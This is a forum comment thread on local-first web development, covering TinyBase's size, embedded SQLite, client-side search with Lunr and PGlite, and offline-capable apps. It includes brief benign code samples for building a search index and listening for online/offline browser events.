A couple podcast episodes featuring the author (mostly regarding his TinyBase project):

- https://www.devtools.fm/episode/67

- https://www.localfirst.fm/12

reply
rurban
27 days ago
[-]
There really must be something less bloated for local static pages. Embedded SQLite and React just for a few nested table queries? Come on, JS has maps and hashtables. React for displaying generated content? My DOM inserter is half a page, and loads instantly.
reply
nosefurhairdo
27 days ago
[-]
The "static page" is referring to https://localfirstweb.dev/. TinyBase, the tool with embedded SQLite and React support (among other things), is for reactive (non-static) web applications. Native JavaScript language features like maps are not an adequate replacement for the functionality offered by TinyBase.
reply
rurban
27 days ago
[-]
What I said. Local embedded SQLite and React is not tiny, it's huge. And slow.

And native JS alone is adequate for a tiny-first web. Clients do care about ms vs 5s load times.

reply
dgb23
27 days ago
[-]
I agree on React, but not necessarily on SQLite. It's made for use cases like this and it can handle quite a lot of data with a humble footprint.

Ironically, if you use something browser-native like IndexedDB plus JS instead, you are also likely indirectly using SQLite, as far as I know.

reply
nosefurhairdo
27 days ago
[-]
The react module for TinyBase is optional, and if you're just using their store module you only add 5.3kb gzipped to your final bundle, hence the name TinyBase.

I also don't think you understand the complexity of the features that TinyBase is offering. It's possible you don't personally need these features, but critiquing the software for not being totally minimalistic is a bit silly.

reply
nsonha
27 days ago
[-]
How do you, say, implement full-text search in a local-first manner? How about vector search? (I don't even know if it's a thing yet; it sounds possible these days.) Imagine saving a local copy of a docs site (a sizable set of pages) and having search and stuff work perfectly.
reply
oneeyedpigeon
27 days ago
[-]
Build the index as a static file and query it using js? This has been my approach so far — admittedly, this isn't with millions of pages, but I'll continue to use it for as long as it works. When hosted on the internet, the search is still blazingly fast, way better than most other sites I come across.
reply
VenturingVole
27 days ago
[-]
For a very similar scenario I'm currently looking to use PGlite: https://pglite.dev/ which is a 3MB WASM build of Postgres which also includes pgvector.
reply
arccy
27 days ago
[-]
stuff like https://lunrjs.com/ works
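
A sketch of that approach with Lunr: build the index at deploy time, ship it as a static JSON file, and query it entirely client-side (docs stands in for your pages):

    import lunr from "lunr";

    // Build once, e.g. in a deploy script, then write it out as JSON:
    const idx = lunr(function () {
      this.ref("url");
      this.field("title");
      this.field("body");
      docs.forEach((d) => this.add(d)); // docs: [{ url, title, body }, ...]
    });
    // fs.writeFileSync("search-index.json", JSON.stringify(idx));

    // In the browser: fetch the static index and query it locally.
    const data = await (await fetch("/search-index.json")).json();
    lunr.Index.load(data).search("local first");
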
reply
nsonha
22 days ago
[-]
Can it index images semantically? That is what vector search can do.
reply
ddanieltan
26 days ago
[-]
Related idea to local-first: https://stephango.com/file-over-app
reply
yaky
27 days ago
[-]
I don't understand: offline-capable software is now being pitched as something profound and genius? There was software before widespread Internet access.
reply
armarr
27 days ago
[-]
This is trying to give users all the benefits of being cloud connected (sync, collaboration, etc) without the requirement of always being connected.
reply
giancarlostoro
27 days ago
[-]
I built an offline-friendly app. It was not offline-first, but it was my first PWA. The idea was that a pilot could have our web page open at high altitudes, potentially with bad service, and they could still interact with everything; once back online, it would push any changes they made. I implemented it with vanilla JS.

The only annoying part was detecting when the browser was back online; I used some hacky solution, since there was no native API for it in any browser at the time, but it worked.
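
For reference, browsers expose this natively nowadays (a sketch; both handlers are hypothetical app functions):

    // Standard events; navigator.onLine gives the current state.
    window.addEventListener("online",  () => flushQueuedChanges()); // push pending edits
    window.addEventListener("offline", () => showOfflineBadge());   // update the UI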

reply
jandrese
27 days ago
[-]
> You see, connectivity is generally good on a boat - wifi, cell coverage, and satellite options abound - so we survive. But when it isn’t good, it really isn’t good. And then suddenly, it dawns on you just how much of your life is beholden to the cloud. Your documents don’t load. Your photos don’t sync. Your messages don’t send. Without necessarily consciously realizing it, we have all moved most of our online existence to other people’s computers!

Welcome to the world a huge chunk of the population lives in. It drives me crazy how quick people were to jump onto cloud computing without ever asking the question "how well does it work when my Internet connection sucks?"

reply
nottorp
27 days ago
[-]
Well, it's always amusing how they discover that applications can run locally without depending on someone else's servers and maybe without pulling unverified code from 50 random repos.

Next they'll discover native applications! Innovation!

Maybe after that they'll even discover that you can give a shit about the user's battery/power consumption and ram consumption again!

reply
paulgb
27 days ago
[-]
The key in local-first is the _first_. The stated goal is to give people the benefits of local applications (no spinners, data outlives the app) with the benefits of cloud applications (low-friction collaboration).
reply
kridsdale1
26 days ago
[-]
reply
satvikpendem
27 days ago
[-]
This is unnecessarily combative. Local-first does not mean local-only, it means that the app should also work on the internet, meaning that you need to solve sync, which is why it took some time for the concept to gain traction. CRDTs for example are relatively new.
reply
kridsdale1
26 days ago
[-]
I mean, native apps have been cloud syncing for more than 20 years.
reply
gessha
27 days ago
[-]
As satisfying as it is to point at local-first software and say they've forgotten history, it's important to remember that a lot of development happens where the friction is lowest.

The target platform for many local-first apps is the browser, because you don't have to mess with EXEs/DMGs/AppImages.

The goal is to ship, not to ship the most efficient application possible.

reply
ngcc_hk
27 days ago
[-]
Seems to need a pointer and an example. What is this mobile at your fingertips tip local but share …
reply
pdyc
27 days ago
[-]
LokiJS and NeDB were better candidates for local DBs, but sadly both are unmaintained.
reply
computerthings
27 days ago
[-]
I never made anything fancy, but I never made anything for the web that I can't run locally. If I can't just sync the changed files to the web server and overwrite the DB (which for my use cases takes seconds), I'm not interested. If it needs to be in the domain root, I'm not interested. A bunch of files using relative paths and a config that checks for running on localhost and points to the local DB or the production one, respectively. That's it (okay plus the domain and a few other things so cookies etc. work, but describing it would take longer than making it), that's all I want out of the web kthxbai. I'm basically stuck in 2000 and I love it.
reply
zwnow
27 days ago
[-]
Nah, I feel like this is the right approach. Apps got too complicated to maintain safely. Web development should be accessible and have good standards. It should have become easier to build webapps over the years, but it's becoming harder and harder.
reply
computerthings
27 days ago
[-]
I say it's easier today, if you keep it simple. Everything I did 20 years ago still works, or works better, or became simpler to do, or is now built into the browser or the language or what have you.

Like this little PHP script I had, to spit out custom gradients before CSS had them; it's weird how fondly I remember that... it wasn't even special or complicated, but it was my grd.php and I used it everywhere :) And on some old pages I never got around to replacing it, I'm sure! Once it works, it just works.

Stay away from frameworks and pre-processors, but also study them (!) and make your own and you'll be fine (that is, you will have a lot less pointless churn). If in doubt, don't put sensitive info on it and don't allow visitors to. There is so much you can do where security really literally doesn't matter, because it's just something cool to make and show people.

reply